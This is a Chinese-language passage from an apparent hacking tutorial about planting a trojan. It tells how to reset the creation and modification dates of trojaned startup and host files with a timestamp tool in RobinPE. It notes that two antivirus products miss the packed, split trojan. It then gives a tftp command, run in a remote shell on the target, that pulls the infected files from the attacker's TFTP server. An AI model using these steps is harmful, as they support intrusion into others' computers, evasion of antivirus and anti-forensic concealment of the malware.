由于植入木马后,启动文件和宿主文件的文件创建和修改日期会发生变化,因此我们需要将文件时间修改恢复原样。在RobinPE中自带了一个叫作“时空机器”的工具,可以修改文件的时间和日期。在文件框中浏览输入文件路径和文件名,然后在界面下方设置程序文件的创建时间和修改时间,最后点击“确认修改”即可(如图4)。
四、上传木马文件
先在本地用金山和瑞星杀毒软件扫描一下被植入木马的启动文件和几个宿主文件,扫描结果未提示有病毒。本来嘛,病毒已经加过壳而且现在被分解了,怎么可能查得出来呢?
现在用TFTPD32.exe在本地建立了一个TFTP服务器(如图5),在远程目标主机的Shell中输入如下命令:“tftp -i 本机IP get 上传文件”,将所有植入木马的文件上传到目标主机的任意目录下。
